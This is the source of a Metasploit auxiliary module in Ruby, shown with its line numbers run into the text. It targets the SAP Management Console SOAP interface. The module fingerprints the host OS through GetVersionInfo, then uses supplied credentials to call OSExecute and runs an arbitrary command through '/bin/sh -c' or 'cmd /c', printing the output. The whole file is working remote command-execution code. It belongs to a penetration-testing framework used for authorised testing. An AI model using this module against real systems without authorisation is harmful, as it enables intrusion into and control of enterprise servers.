Path: blob/master/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize11super(12'Name' => 'SAP Management Console OSExecute',13'Description' => %q{14This module allows execution of operating system commands through the SAP15Management Console SOAP Interface. A valid username and password must be16provided.17},18'References' => [19# General20[ 'URL', 'http://blog.c22.cc' ]21],22'Author' => [ 'Chris John Riley' ],23'License' => MSF_LICENSE,24'Notes' => {25'Stability' => [CRASH_SAFE],26'SideEffects' => [IOC_IN_LOGS],27'Reliability' => []28}29)3031register_options(32[33Opt::RPORT(50013),34OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),35OptString.new('HttpUsername', [true, 'Username to use', '']),36OptString.new('HttpPassword', [true, 'Password to use', '']),37OptString.new('CMD', [true, 'Command to run', 'set']),38]39)40register_autofilter_ports([ 50013 ])41end4243def run_host(ip)44# Check version information to confirm Win/Lin4546soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'47xsi = 'http://www.w3.org/2001/XMLSchema-instance'48xs = 'http://www.w3.org/2001/XMLSchema'49sapsess = 'http://www.sap.com/webas/630/soap/features/session/'50ns1 = 'ns1:GetVersionInfo' # Using GetVersionInfo to enumerate target type5152data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"53data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv54data << '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"55data << '<SOAP-ENV:Header>' + "\r\n"56data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"57data << '<enableSession>true</enableSession>' + "\r\n"58data << '</sapsess:Session>' + "\r\n"59data << '</SOAP-ENV:Header>' + "\r\n"60data << '<SOAP-ENV:Body>' + "\r\n"61data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"></' + ns1 + '>' + "\r\n"62data << '</SOAP-ENV:Body>' + "\r\n"63data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"6465print_status('[SAP] Attempting to enumerate remote host type')6667begin68res = send_request_raw({69'uri' => normalize_uri(datastore['URI']),70'method' => 'POST',71'data' => data,72'headers' =>73{74'Content-Length' => data.length,75'SOAPAction' => '""',76'Content-Type' => 'text/xml; charset=UTF-8'77}78}, 60)79rescue ::Rex::ConnectionError80print_error("#{rhost}:#{rport} [SAP] Unable to communicate")81return :abort82end8384if !res85print_error("#{rhost}:#{rport} [SAP] Unable to connect")86return87elsif res.code == 20088body = res.body89if body.match(/linux/i)90print_status('[SAP] Linux target detected')91cmd_to_run = '/bin/sh -c ' + datastore['CMD']92elsif body.match(/NT/)93print_status('[SAP] Windows target detected')94cmd_to_run = 'cmd /c ' + datastore['CMD']95else96print_status('[SAP] Unknown target detected, defaulting to *nix syntax')97cmd_to_run = '/bin/sh -c ' + datastore['CMD']98end99end100101osexecute(ip, cmd_to_run)102end103104def osexecute(rhost, cmd_to_run)105print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")106success = false107108soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'109xsi = 'http://www.w3.org/2001/XMLSchema-instance'110xs = 'http://www.w3.org/2001/XMLSchema'111sapsess = 'http://www.sap.com/webas/630/soap/features/session/'112ns1 = 'ns1:OSExecute'113114data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"115data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi116data << '" xmlns:xs="' + xs + '">' + "\r\n"117data << '<SOAP-ENV:Header>' + "\r\n"118data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"119data << '<enableSession>true</enableSession>' + "\r\n"120data << '</sapsess:Session>' + "\r\n"121data << '</SOAP-ENV:Header>' + "\r\n"122data << '<SOAP-ENV:Body>' + "\r\n"123data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><command>' + cmd_to_run124data << '</command><async>0</async></' + ns1 + '>' + "\r\n"125data << '</SOAP-ENV:Body>' + "\r\n"126data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"127128user_pass = Rex::Text.encode_base64(datastore['HttpUsername'] + ':' + datastore['HttpPassword'])129130begin131res = send_request_raw({132'uri' => normalize_uri(datastore['URI']),133'method' => 'POST',134'data' => data,135'headers' =>136{137'Content-Length' => data.length,138'SOAPAction' => '""',139'Authorization' => 'Basic ' + user_pass,140'Content-Type' => 'text/xml; charset=UTF-8'141}142}, 60)143144if res && (res.code == 200)145success = true146body = CGI.unescapeHTML(res.body)147if body.match(%r{<exitcode>(.*)</exitcode>}i)148exitcode = ::Regexp.last_match(1).to_i149end150if body.match(%r{<pid>(.*)</pid>}i)151pid = ::Regexp.last_match(1).strip152end153if body.match(%r{<lines>(.*)</lines>}i)154items = body.scan(%r{<item>(.*?)</item>}i)155end156elsif res && (res.code == 500)157case res.body158when %r{<faultstring>(.*)</faultstring>}i159faultcode = ::Regexp.last_match(1).to_s160fault = true161end162else163print_error("#{rhost}:#{rport} [SAP] Unknown response received")164return165end166rescue ::Rex::ConnectionError167print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")168return :abort169end170171if success172if exitcode > 0173print_error("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}")174else175print_good("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}")176end177178saptbl = Msf::Ui::Console::Table.new(179Msf::Ui::Console::Table::Style::Default,180'Header' => '[SAP] OSExecute',181'Prefix' => "\n",182'Columns' => [ 'Command output' ]183)184185items.each do |output|186saptbl << [ output[0] ]187end188189print_good("#{rhost}:#{rport} [SAP] Command (#{cmd_to_run}) ran as PID: #{pid}\n#{saptbl}")190191elsif fault192print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")193return194else195print_error("#{rhost}:#{rport} [SAP] failed to run command")196return197end198end199end200201202